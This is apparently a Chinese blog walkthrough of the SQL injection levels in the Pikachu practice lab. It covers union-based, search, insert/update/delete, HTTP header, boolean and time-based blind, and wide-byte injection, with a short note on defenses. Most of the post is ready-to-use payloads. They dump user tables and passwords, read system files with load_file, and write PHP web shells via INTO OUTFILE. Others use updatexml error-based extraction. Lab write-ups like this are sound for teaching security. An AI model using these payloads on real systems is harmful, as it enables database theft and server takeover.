皮卡丘SQL注入汇总

文章详细介绍了SQL注入的原理、危害以及不同类型SQL注入的实战示例,包括数字型、字符型、搜索型和宽字节注入等。同时,提出了防止SQL注入的策略,如参数化查询和ORM框架的使用,并展示了如何通过注入攻击进行数据库信息泄露、系统权限提升等操作。
摘要由CSDN通过智能技术生成

1.Sql Inject(SQL注入)概述

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击

Sql 注入产生原因:

当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。

Sql 注入带来的威胁主要有如下几点:

猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
绕过认证,列如绕过验证登录网站后台。
注入可以借助数据库的存储过程进行提权等操作

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

2.数字型注入(post)

看题目,我们先选择查询id为1的用户

我们查看上方url,发现没有传参,说明其实post类型

这种时刻就该把bp请出来了,我们进行抓包

果然是post传参,将其发送到Repeater

找列数:id=1 order by n# &submit=%E6%9F%A5%E8%AF%A2,n为猜测的列数,如果猜测的列数大于select语句查询的结果的列数,会返回报错

比如,n为5时,就会报错。经过测试,列数为2

爆库:id=1 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2

爆表:id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆列:id=1 union select group_concat(column_name),2 from information_schema.columns where  table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆数据:id=1 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2

读文件 :id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

写马:id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/1.php'#&submit=%E6%9F%A5%E8%AF%A2

这里就不一一演示了嘿嘿

然后我们猜测sql语句为

select 字段1,字段2 from 表名 where id=1

我们再试试id=1 or 1=1&submit=%E6%9F%A5%E8%AF%A2,将其改为

select 字段1,字段2 from 表名 where id=1 or 1=1

上面其他语句也是同样的原理

在id=1后加上or 1=1试试

由此将所有用户信息显示出来! 

3.字符型注入(get)

看题目,我们输入kobe 

看上面url有显示,开始进行sql注入步骤:

查看源码,要用'来闭合

找列数:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by n%23&submit=%E6%9F%A5%E8%AF%A2

n为猜测的列数,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径根据自己搭建皮卡丘时的路径而定

原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

如,我们访问http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by 5%23&submit=%E6%9F%A5%E8%AF%A2,就会报错

最终发现查询结果列数为2

爆库:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&submit=%E6%9F%A5%E8%AF%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

这里还是不演示了,就是这么个道理!

我们同样猜测此sql语句为:

select 字段1,字段2 from 表名 where username = 'kobe';

同样将它改为(用一个单引号将前面的单引号闭合):

select 字段1,字段2 from 表名 where username = 'kobe' or 1=1#';

输入:kobe' or 1=1#试试

同样将所有用户的信息显示出来!

4.搜索型注入

看题目说可以输入名字的一部分

我们只输个“k”,网页返回所有带k的,且上面同样有url显示 

所以一些sql注入语句(找列数、爆库、爆表啥的),还是老套路

查看源码,这次用%'来闭合 

找列数:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' order by n%23&submit=%E6%90%9C%E7%B4%A2

n仍为猜测的列数,同样,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径还是根据自己搭建皮卡丘时的路径而定

本次发现查询结果列数为3

爆库:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,load_file('C:/Windows/win.ini')%23&submit=%E6%90%9C%E7%B4%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,'<?php eval($_POST[3]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/3.php'%23&submit=%E6%90%9C%E7%B4%A2

这此猜测sql语句为:

select from 表名 where username like%k% ';

%代表没有或有多个字符,所以可对含有k的用户进行查询,我们再在改为(用%'来闭合):

select from 表名 where username like%k% ' or 1=1 #%';

输入k% ' or 1=1 #

所有用户的信息显示出来!

5.xx型注入

老样子老样子,输入kobe,发现上面同样有url显示

我们仍需考虑是什么闭合,查看源码发现相较于字符型注入,多了括号,所以这次用')来闭合

找列数:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') order by n%23&submit=%E6%9F%A5%E8%AF%A2

n:猜测的列数,说了无数遍了嗷!

爆库:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select database(),2%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(distinct table_name),2 from information_schema.columns where table_schema='pikachu'%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273%23&submit=%E6%9F%A5%E8%AF%A2

爆内容:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1, load_file('c:/windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1,'<?php assert($_POST[4]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/4.php'%23&submit=%E6%9F%A5%E8%AF%A2

我们再输入') or 1=1#,同样是用')来闭合

所有用户信息!

6.insert/update注入

本关没有给出账号密码提示,我们点击注册

填好信息后,用bp抓包。从抓包结果看是post型的,除了submit之外有6个参数。

先是update注入,因为你得先注册才能修改信息吧

那就还得先了解一下updatexml()函数的用法:

语法:updatexml(xml document, XPathing, new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,也就是表中的字段名

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

那么怎么破解呢?跟上几关的思路不一样,本关是写一个报错注入,再报错回显时将我们想要得信息显示出来

回到注册界面,在用户栏写如下代码(注意闭合):

' or updatexml(1, concat(0x7e, database()), 0) or '

密码那些随便写,提交后得到以下界面

看起来是个报错,其实已经回显了数据库名

同理可以把database()改为其他函数来获得更多数据库信息

insert注入

我们注册好一个用户666并登录

点击修改个人信息,再在性别一栏输入刚才的代码:

' or updatexml(1, concat(0x7e, database()), 0) or '

提交后同样得到了数据库名

其他的爆表爆列啥的,就不写了哈

7.delete注入

随便输入一条留言666

再点击删除,同时用bp抓包,发现其是GET传参

send to repeater

之后在id=后输入如下代码将其闭合

1 or updatexml(1, concat(0x7e, database()), 0)

再将此段代码转换为特殊字符的url编码

改完后就是这个样子

最后send,就得到了数据库名(和上题一样,还是以报错的形式)

8."http header"注入

首先来了解一下什么是"http header"注入

有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证), 或者通过http header头信息获取客户端的一些资料,比如useragent、accept字段等,会对客户端的http header信息进行获取并使用SQL进行处理, 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。

接下来看题目,按提示,我们用admin登录

刷新一下并用bp抓包

可以发现由上文提到的user agent 

send to Repeater后,再修改user agent ,如下

' or updatexml(1,concat(0x7e, database()), 0) or '

最后send,成功得到数据库名(仍以报错的方式) 

9.盲注(base on boolian布尔类型)

首先了解下盲注的概念

(1)盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。

通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。

(2)盲注又分为布尔类型和时间类型

什么情况下使用布尔类型的盲注?

**没有返回SQL执行的错误信息

**错误与正确的输入,返回的结果只有两种

什么情况下使用时间类型的盲注?

**页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样,此时需要使用时间类型的盲注。

时间型盲注与布尔型盲注的语句构造过程类似,通常在布尔型盲注表达式的基础上使用IF语句加入延时语句来构造,由于时间型盲注耗时较大,通常利用脚本工具来执行,在手工利用的过程中较少使用。

接下来看题,本题为布尔类型

我们输入kobe' or 1=1#

再试试kobe' or 1=2#

可见,只有我们输入的条件为真时,才能输出正确信息

这次我们输入kobe' and length(database())=1#,显示您输入的username不存在.......

再把1换成2,以此类推,发现=7的时候,输出了正确信息

那么,我们就知道了数据库长度为7,同理,更换其他函数来测试其他数据

10.盲注(based on time)

本题就是基于时间类型的盲注了,题目不告诉你了嘛

上面说了,此种类型适用于无论输入是否正确,都返回相同数据,我们无法判断自己输入的条件是否为真,所以在后面加了一个时间限制

先向上题那样,输入kobe' and length(database())=7#

试试其他语句,我们发现 ,无论输入什么,回显的都是这句话

所以,我们这时就可以使用时间盲注了

输入kobe' and if(length(database())=7, sleep(1),5)#

意思为:若length(database())=7正确,延迟1秒返回:若不正确,延迟5秒返回

我们去测试,发现返回的虽然都是那句I don't care who you are!

但条件正确和不正确的回显时间不同,以此来判断哪个是正确条件

11.宽字节注入

还是先了解一下宽字节的原理

先了解一下什么是窄、宽字节已经常见宽字节编码:

**当某字符的大小为一个字节时,称其字符为窄字节.

**当某字符的大小为两个字节时,称其字符为宽字节.

**所有英文默认占一个字节,汉字占两个字节

**常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等

宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为’,其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。

接下来看题,我们随便输入一个用户123,用bp抓包发现其是post类型的

再send to Repeater

然后将name修改为如下代码(注意f后面有个单引号)

1%df' union select 1,2#

最后send一下,成功得到我们想要的信息!

终于写完了啊啊啊啊!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值